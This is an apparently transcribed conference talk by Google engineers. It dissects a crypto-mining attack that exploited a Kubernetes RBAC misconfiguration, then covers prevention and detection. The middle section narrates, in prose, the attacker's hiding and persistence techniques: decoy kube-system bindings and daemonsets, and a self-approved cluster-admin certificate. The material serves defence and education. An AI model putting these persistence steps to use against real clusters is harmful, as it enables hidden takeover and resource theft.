 All right, everyone, well, let's get started. So I'm Greg. This is Vinayak. We're from Google. We're going to talk about how crypto miners have been exploiting some RBAC misconfigurations. Whoa. That was not a good slide transition. Try that again. So if you were paying attention to the press back in March or April, beginning of this year, you might have seen some headlines along these lines, these new attacks that are leveraging Kubernetes RBAC to back to our clusters. We saw some of that happening on GKE. And so that's what we're going to talk about today. We're going to talk about the root cause, which was actually a customer misconfiguration of the cluster. And we're going to walk through the whole attack, do a demo of the attack, and talk about the prevention and detection options for that attack. I thought it might be interesting just to cover a little bit about what's actually new here. We've had Kubernetes misconfigurations before. We've had Docker ports exposed to the internet. We've had Cubelet ports on the internet. We've had Kubernetes dashboards exposed to the internet. And there's been scanners out there targeting all those things. So that's not really that new. The other thing that isn't really that new is container delivered crypto miners. That's the thing that's been around for quite a while now. You can find well-packaged container crypto miners on Docker Hub. The new and interesting thing here is some Kubernetes specific hiding techniques that the attacker used and the way they persisted. So we'll cover that in a fair amount of detail. Really quick high-level overview of the attack. The root cause here, as I said, was this customer RBAC misconfiguration that effectively gave the whole internet cluster admin. And you might be like, I would never do that. But if you're just googling for access control advice on the internet and finding pages that give you bad advice, there's definitely pages out there that will tell you to do this to create this binding. So it's not, perhaps, as unusual as you would think. So the attacker was out there on the internet scanning for this kind of misconfiguration, found this one. They came in and created a whole bunch of different access to give themselves control of the cluster. And then they also did a little bit of covering their tracks as well, too. So we have Google Cloud signals that detected this crypto miner activity and alerted the customer about it. We also helped them out with the investigation to figure out what was going on. And once we'd done that, we also looked at who else had made this misconfiguration, and there were a handful of other customers that had sort of done something similar, so we notified them. And then we actually prevented by default now. And we'll talk about that in more detail in just a bit. And I'm just going to hand it over to Vinayak to give you a demo. Thanks, Greg. So yeah, before we jump into the attack demo, I just wanted to cover a few Kubernetes concepts. So the first one is cluster admin. A lot of you probably know about this role. But cluster admin is a default role that Kubernetes creates and gives all permissions for all resources. And if you start using it in cluster role bindings, then you give those permissions across every namespace, so essentially kind of giving root and cluster. And we kind of think of it as analogous to root on Linux, where having these broad permissions is sometimes useful for some users to do maintenance or management. But it has to be wielded very carefully. And so don't go delete it, but also make sure that you're auditing who's able to have these permissions. And so the other thing that we wanted to talk about was some system users and groups that might be helpful to know before we go into the demo. And so here I've kind of got a diagram of Kubernetes auth. And so when a request comes in, there's a bunch of authenticators that Kubernetes has based on your configuration. And then three things can happen. The first thing is that it's a successful request. So basically you have a token, and that token is valid. And then the authenticator says, yep, this is valid. And then your identity provider, based on the authenticator you have, assigns the user. And then the group is system authenticated. And so that kind of indicates that, hey, this user was authenticated, and then that information gets passed on to OZ. The other flip side of this could be that you have an invalid token, and so there's just a failure. And so you get a 401. But the third case is that you don't have any auth information. And in that case, if you have anonymous auth enabled, what happens is that this anonymous authenticator is used. And all it does is it sets the user to system anonymous, and then sets the group to system unauthenticated, which kind of indicates that, hey, I don't know who this person is, and they did not authenticate. But since the anonymous auth is enabled, that information, that request won't be rejected and will be passed down to OZ. So you must be thinking, hey, why does system anonymous exist? And it's on by default in K8S. And K8S creates this binding call system public info viewer, which lets you look at health status and cluster versions and stuff like that. And a lot of load balancers use this. QADM also relies on this to do some private key information exchange during QADM cluster bootstrap. And then finally, if you watch the demo by SigAuth, they were also using this for checking the healthy. So yeah, there's valid scenarios where system anonymous and system unauthenticated can be used. And then a note on system authenticated, a lot of you might be thinking, oh, this is fine. It's authenticated. But based on your cluster setup or your identity provider setup, this might mean a lot of things. It can mean, hey, no one, and require some additional setup in your cloud provider. Or it could mean everyone at your company. It could mean everyone at that identity provider that you're using. And so in GKE, it actually means, GKE kind of aligns with IAM's all authenticated user, which means anyone with a Google account. But one note is that this is authentication and not authorization. So just because they can access the cluster doesn't mean they have any valid permissions in it. All right, and now I'll move to the demo. So let's first look at the customer misconfiguration here. So the customer created a cluster role binding where they bound cluster admin, the super powerful role, to system anonymous. And when they create this such a binding, they basically give anybody who can access the QABS server unrestricted access to the cluster. And so attackers are usually scanning. So like now we're on the attacker machine. Attackers running the super complicated scanning script. And then they find a target. And so this is the first thing that the attacker did in this cluster. Based on our investigation, they created a cluster role binding. And they named it Cube Controller Manager. And if that name sounds familiar, it's because it's a core component of Kubernetes. So this was one of the attempts to hide in the system noise. And then they bound the role cluster admin to the default service account of CubeSystem namespace. So essentially any workload that runs in CubeSystem namespace that does not specify a service account gets the default service account. And so if a workload does not specify the service account in this case, they will run as admin. So this was another way to hide the permissions that a workload might have. And so they created a workload after that. So they named it CubeController. They ran it in CubeSystem namespace. This was a daemon set. And they even attempted to kind of make the image look legitimate by almost spelling Kubernetes isle. So that was another attempt they made to kind of hide. And then as you notice in the spec, they don't have a service account specified. So this is running as the default service account in the CubeSystem namespace. And so this workload is running as cluster admin based on the binding that they made. And so once they have this, they have a foothold. And this workload is running their crypto miner. But they actually tried to install persistence. So this was happening from within the daemon set now. So the first thing they did was create a CSR, which is a certificate signing request. And it's a way to send a request to QBBI server to get a certificate signed that you can later use to authenticate with QBBI server. And so let's look at this large base64 blob here. And so all I'm doing here is extracting that from the YAML and then sending it base64 decoding it and sending it to open SSL. And you can see the subject here is set to common name equals cluster admin. So common name CN here stands for a common name. And so anybody who presents that certificate to QBBI server now, their user will be treated as cluster admin. So they'll show up as user cluster admin. So this is another attempt to hide. So now once this CSR is created, somebody has to go approve it, right? Usually that's cluster admin, but lucky for them, they already had this permission. And so they can approve their own CSR. And once a CSR gets approved, there's controllers in Kubernetes that will go and sign it. And so let's check if the CSR is signed. Yeah, OK. So yeah, we're getting the CSR. And as you can see, it's issued. So now they can extract the certificate. And then what the attacker did was they also deleted the CSR to kind of hide their tracks. CSRs, which are approved, are also auto deleted. So OK. So now the attacker has a identity, right? They have this user cluster admin that they've got, but that user has no bindings. So the attacker then created another binding. And in this case, they bound cluster admin to that user cluster admin. So now anybody who holds the certificate has unrestricted access to the cluster. So now the attacker is back on their machine. And now they can, if you see what permissions they have based on the certificate, they have all the permissions. So they're a happy crypto miner. They can access this cluster, even if that initial misconfiguration has been removed. OK, cool. So some further observations from this attack. The time to exploitation was eight days, which means that from the time the customer created the misconfiguration to the first signs of malicious activity that we noticed was eight days. What was really unique here was they're trying to blend into the system noise by creating controllers that had creating daemon sets that had cube controller names in the cube system namespace, which is where customers are asked not to run their workloads, because that's reserved for system workloads, trying to use a semi-legit looking image, or even using the trick of relying on default service accounts, where if you don't carefully look at the YAML, you might miss some information. The payload itself was xmrig, so nothing special here. The daemon set was actually running some kind of script that was running kubectl commands. This was based off the user agent. And then finally, one thing that we noticed was that they actually pushed multiple image updates to the daemon set. And in the past, we've usually seen people updating their payload by doing it in payload. But they actually relied on Kubernetes deployments and daemon sets to update their payload. So that was very unique about this attack. And so with that, I've covered the attack portion of it. And so I'm going to hand it to Greg to cover the prevention and detection. OK, let's talk about prevention. If we think about the misconfiguration surface here, we demoed in detail that first one, the system anonymous misconfiguration. You could do basically the same thing with system unauthenticated. So system anonymous as a user, system unauthenticated as a group, but they're basically the same group of anyone on the internet kind of stuff. And then there's also the system authenticated that we talked about, which varies depending on your configuration. And so if we think about each of those, there's three different principles here. There's two different places you can bind those permissions at the cluster in the namespace level. So that's six different combinations of possible things you might need to worry about. So we wrote them all out. There's a link here to the GitHub where all the demo code is. You can see exactly all that YAML. But when we're thinking about prevention, we're going to try and think about this whole group of misconfigurations as possible. Big list of prevention options here. We're going to step through each one of these and talk about them in some detail. So the first most obvious one was this was an internet exposed API server. If that wasn't network reachable, then this wouldn't have been a problem, or it would have only been a smaller problem rather than having everyone on the internet. It's everyone who can actually get to the API server. And so if you're thinking about limiting network access to the API server, there's some other advantages. Why that's occasionally a good thing to have too. There's some denial of service protection. You might get some protection from other authentication or authorization misconfigurations, or just vulnerabilities that are in the API server. So there's a couple of different ways you can do that. You can do both of them. You can run in a private address space. It's not routable. You can put a firewall in front of it. On GKE, we let you do both of those things. And most other managed providers will do the same. Second one, let's talk about anonymous OAuth. So if we look at what the CAS Security Benchmark says about anonymous authentication, it says it's generally reasonable to allow anonymous access if you're using it for health checks and discovery. And that was those load balancer and those kind of use cases that we talked about before. So this setting is true by default. Anonymous source equals true. You can set it to false if you have control of the API server flags. If you're using a managed Kubernetes provider, you might not have that control. You don't have it on GKE. And so I think there's more we can do here to make this a safer default. And so we actually got that on the agenda for SigAuth. And so if you're looking at the slide and thinking, hey, I wish that was better, and we could restrict this access without breaking stuff, then we think the same. And we should go talk about it and figure out how we can make this a safer default. So moving on, assuming that anonymous OAuth is on, you can make some of those bindings. And so the thing we saw in this attack was binding specifically cluster admin to one of these three groups or user. And you can prevent that with admission. It's pretty easy to do that with an admission controller. There's a bunch of them listed here. You could use Gatekeeper Covono. You could actually use the new beta feature of the validating admission policy that's being built into Kubernetes now that doesn't even require you to run a separate validating admission. And that would block these bindings from happening. So we're going to demo that from happening. On GKE, we're just outright preventative, because there's really no good reasons to be doing cluster admin to these particular principles. They're kind of dangerous. So on GKE as a 128, this is just blocked outright. You could go a little further. So that's just cluster admin to just those users and groups. So we looked into what people are doing with these users and groups. And there's a few different things. We've already talked about load balancers and health checking and that kind of stuff. QBADM uses it as part of their bootstrapping. There's a Rancher uses it as a very limited pre-Orth API that they expose. Bitnami has a similar thing where they're exposing a very limited subset of functionality just to get the system up and running. And so if we block any binding, there will be a few things that you might run into. We also saw people using these for CICD metrics to be able to give metrics to a dashboard without having that dashboard have to handle authentication. And there are a lot of pod security bindings to system authenticated. That's kind of end of life now anyway. So the last version that supports pod security policies is now end of life. So I probably don't need to worry about that one too much. I think generally this is reasonably safe to do. These are smaller use cases that may not actually affect you. And so you can do this with admission, and we'll do that in the demo as well. So we talked about a few different kind of combinations there, cluster admin to these groups. And then what about just like bindings that involve cluster admin generally? That's a category that we might want to worry about. And again, the CIS benchmark here is, hey, you should probably be careful with cluster admin. It's like the root of Kubernetes. So be careful who you give it to. It is fairly widely used both by humans, probably where it shouldn't be, and also by system components. So you can sort of block this, but I think I'd like tread fairly carefully. So on GKE, we have a policy controller, like a managed policy that you can enforce that will let the pieces of GKE that need this work without breaking GKE. And so I think if you're going to do this on a managed platform or a platform where you don't have full control about it, you just need to sort of carefully work through that. But it's possible to add restrictions here. So let's demo some of that stuff. So the first thing we're going to do here is just try and grab the secrets out of the cluster. We're completely unauthenticated to this cluster. We're coming at it from the internet. So we're not expecting this to work. So you can see here this access is forbidden, where user system anonymous, and we don't have access to get to secrets in this cluster. And that's working as intended. We get a 403. So if we just look at the role that we're going to add to this cluster, it's the same one that Vinayak talked about, system anonymous to cluster admin. And we put that on the cluster. And then we try to say the same thing again. And I'm just going to avoid a giant blob of text on the screen. I'm just going to summarize this with jQuery. And so you can see now this works. So we broke the cluster. We gave this authentication. And now anyone on the internet can come along and get our secrets. So that's bad, and we don't want it to be like that. So we'll delete that role binding again. And now we're going to install gatekeepers. So gatekeepers are an open source submission controller. And it's going to help prevent those bindings from getting created in the first place. So gatekeeper requires a constraint template and a constraint. And so what we're doing here is just adding those two things. We're using the disallow anonymous constraint template and constraint that's built in the gatekeeper to prevent those bindings from being created. And we'll try making that binding again. We get an error from gatekeeper saying, hey, that's not allowed. The unauthenticated user reference is not allowed in this role binding. So that's great. That's how we want things to be. I mentioned on GKE we're blocking this by default. So on GKE 128, so we'll just create a cluster there. And we'll just try the same thing, just making the binding there. We don't have to create any admission controllers or do any other configuration. We're just going to block it outright. So GKE Warden is the built-in admission that GKE has. And it's saying, yeah, you can't bind this cluster admin to system anonymous. So that's prevention. Let's talk about detection. Three different categories here. We can talk about detecting the misconfiguration. So the thing we did wrong to start with, we can talk about what the attacker did on the cluster, the actual exploitation. And then we can talk about the payload itself. And so we'll cover those three categories. Logs are really great here. So we can find a bunch of stuff in logs. There's three different things we could look for here. We can look for exactly that cluster admin to system user or groups thing happening. And if that's happening, that's really bad. That's the thing we're preventing by default on GKE. But if you're just going to take a detect-only strategy, you definitely want to do this one. So the second there is that any bindings to those big groups or users, they may or may not be bad. We talked about a couple of use cases there where it might be intended. And then the probably more noisy, more used bindings to cluster admin. But you can find all this stuff happening in the logs. And we've actually got a bunch of log queries in the slides where you can, if you want to build this kind of detection yourself, you can go do it. We also wrote a little script that will audit your existing role bindings and tell you if you've got exactly this problem that there's bindings that shouldn't be bound to these system users and groups. On GKE, this is done for you with event threat detection. So it goes and looks at the logs and notifies you about this stuff. So we're just going to show that quickly. So this is our security command center UI. You can see we've got a couple of high priority findings here. And this critical one is this privilege escalation. So as we were beating up that cluster, misconfiguring it like crazy, ETD was in the background looking at the logs. It's found a bunch of other stuff here, too, some like lower severity findings. But there's this critical one here that is related to these back bindings. So we get a description. We get the user that created it at the time, all the stuff that you'd sort of expect here. And if we scroll right down, we get a link to the actual log. And so we can go look at the details of the log itself and see kind of the full and all the information about what happened here and who did this, where did they come from, and what did they do. So you can see here cluster admin binding the system anonymous. And as I said, that's the Google version. But there's queries in here to help you write your own similar detection. OK, so unused permissions. Cluster admin isn't the only privileged role out there. You can just make your own. And you can make your own mistakes with your own cluster admin. So you could make a new role that's star-star, just like cluster admin, and go bind it to a bunch of stuff that shouldn't have that access. And so this is sort of a more general least privilege permissions problem that you need to think about and potentially solve. In terms of open source tools, there's not a whole lot in this area that will help you with this general case. There's this tool from Palo Alto called RBAC police that can tell you about some privileged roles. But it won't tell you if they're in use or how over permissioned it is. It'll just let you know, hey, there's these things that look like they might be over permissioned. But you can't tell if it's actually being used. There are a bunch of third party tools and a bunch of vendors on the KubeCon floor that will be able to sell you tools that tell you whether your permissions that you've granted are being used. And so there's ways to detect this today. On GKE, we have IAM recommender that covers this for IAM. And so if you do your bindings through IAM, then we'll be able to say, hey, there's six out of 10 of these permissions aren't actually being used regularly. So you could probably slim down this role a bit and get it to something closer to least privilege. And that's really the sort of recommendation we're looking for here. So we're not covering RBAC just yet. And then the third category was the sort of detection of the misconfiguration. And this is the second category, the exploitation detection. So what did the attacker actually do on this cluster? So we can look at system anonymous activity. It's pretty simple here. If the anonymous activity is actually authorized, then that's probably bad. So it's probably a reasonable signal of this one. We can look at that certificate creation work that the attacker was doing. There is a little bit of system use for the CSR API. So depending on sort of which provider you're using and what your own organization is doing with that Kubernetes API, there might be more noise in this signal. So here I filtered out just the stuff that GKE does with certificates. And so you might have to do similar things. So we issue certificates to the Kubelet for using this mechanism. So you have to filter those out if you don't want noise in this signal. And then the third thing, I think pretty common sort of security problem in the industry is detecting crypto miners. So you can find a lot of vendors that will do this for you, I'm sure. The typical techniques, bad IPs, bad domains, the containers themselves, the binaries in those containers. And on GKE, we've got a whole bunch of crypto mining detection you can turn on. We have event threat detection looking at logs. And then if you actually go opt in and ask us to do it, we can scan the memory of the VM from outside the hypervisor, and that's what VM threat detection does. So we can actually find a crypto miner that's running in memory without having an agent. I think that's a pretty cool capability. So just summing up here, we had this pretty interesting Kubernetes-specific attack. In terms of the prevention options, we talked about limiting access to the API server. And then there's a bunch of stuff you can do at our back level to prevent those bindings from happening or at least detect ones if you're not going to prevent. On the detection side, there's also a bunch of strategies here so you can audit what you've got. So if you say you put in detection today, then that will cover you from this point onwards. But you want to look at what you've already got as well too. So there's definitely an auditing part of this that you need to remember to do if you haven't got anything today. But so overall, this was a pretty good news story, really. So yes, there was a compromise. Yes, a bad guy was operating in there. But we were able to detect it. We were able to prevent it for everyone else operating on GKE and then also share that knowledge with the community. And hopefully others will be able to build similar prevention and protect everyone by default. So a whole bunch of links here. All the demo code is up on GitHub. You can give us feedback through this QR code. Everything we link to here is, and that'll also get you to the slides. And at the back of the deck here, we've got some more detection log queries if you want to go build that detection yourself. So I'm happy to take any questions. There's a couple of mics. There's one here and one there if folks have questions. Thanks for the talk. Really cool. So for that affected customer, did you have to rotate their cert after everything was cleaned up? Yeah, so we gave them some advice about cleanup. So it's kind of when you have a compromise like this where a attacker has cluster admin, it's kind of burn it down. Like there's not really any coming back from that. And so they were running their own incident response process, but yes, kind of burn the whole cluster down is basically the advice because they've had complete control in there. And then you also need to look at the trust relationships that that cluster had. So were there secrets in there that give them access to other systems and you think about those trust relationships as well? Right, that makes sense. So even if you delete the cluster role, if you still have that certificate, then you essentially always have a way in, right? Yeah, if you delete the cluster binding that was the cluster role binding that was the misconfiguration, then so yeah, if you just kind of were like, oh, I see Anonymous was doing stuff and I went and looked at what Anonymous did and Anonymous created this role binding and so I'm going to clean that up and get rid of that role binding. That's not enough because they have created this like separate certificate that gives them access, even if you cleaned up that misconfiguration that was the entry point, so yeah. Right, I guess my question is inside of that certificate, it said that the group was cluster admin, but then even if you delete everything within your cluster that gives any semantics to cluster admin, them having that cert, they could still essentially get any access they want. So the certificate is for the cluster. So like the CA that issued that is for the cluster, so if that cluster is gone, like that's the end of the access. OK, thanks. Thanks for the talk. Do you see RBAC compromises across cluster and like GKE or Google roles as well? And I'm curious how those two work together. Across cluster. So I guess I mean like Google has federation with the service accounts are federated with Kubernetes and vice versa. Do you see people hopping between a Google role and then a GKE role and then back to Google resources? Right, yeah. So just generally when we think about attacks, if someone is able to operate inside a pod, let's say that has a Kubernetes service account attached, then they have sort of whatever privileges that service account has. And then if you've used workload identity or something similar to like match that Kubernetes service account up with a Google service account, then they also have whatever privileges that service account had. So if it was like, I don't know, be able to read out of a certain bucket or publish to a Pub-Sub or whatever it is. So we haven't seen attackers do that and be sort of like workload identity aware and like go off to the Google resources. But sort of once you have that compromise there, there's no reason you wouldn't have that access if like that's the area that you've compromised. Awesome talk. I didn't even know about the system anonymous stuff. That's crazy. Do you guys have an opinion on that being defaulted on? I know you mentioned you were going to put it on the schedule for SIG off. What are your thoughts? Yeah, I think it's been a default for a while now. And it has a bunch of dependencies. We talked about a few of them. And so I think we need to tread fairly carefully there. But it would be great if there was a third option that was kind of allow the discovery role to work, but don't let anyone else bind anything else to this. Like, so there's not a sharp edge there anymore? I think like that's the sort of thing we're going to go discuss in SIG Auth and see if we can be like, hey, can we just leave discovery there and not break the stuff that is like quite a large amount of dependencies on. But also remove this sharp edge where people can go configure stuff, bind stuff to this when they probably shouldn't. Awesome, thank you. Yeah, thank you for the talk. It's great. Wondering if you're going to suggest other cloud providers to adapt something similar in terms of disallowing it as the default? Yeah, part of sharing here is definitely like bringing awareness. And I've talked to the security leads of other cloud providers pretty regularly. I talked to them yesterday about this subject. So we'll see. All right, thanks a lot.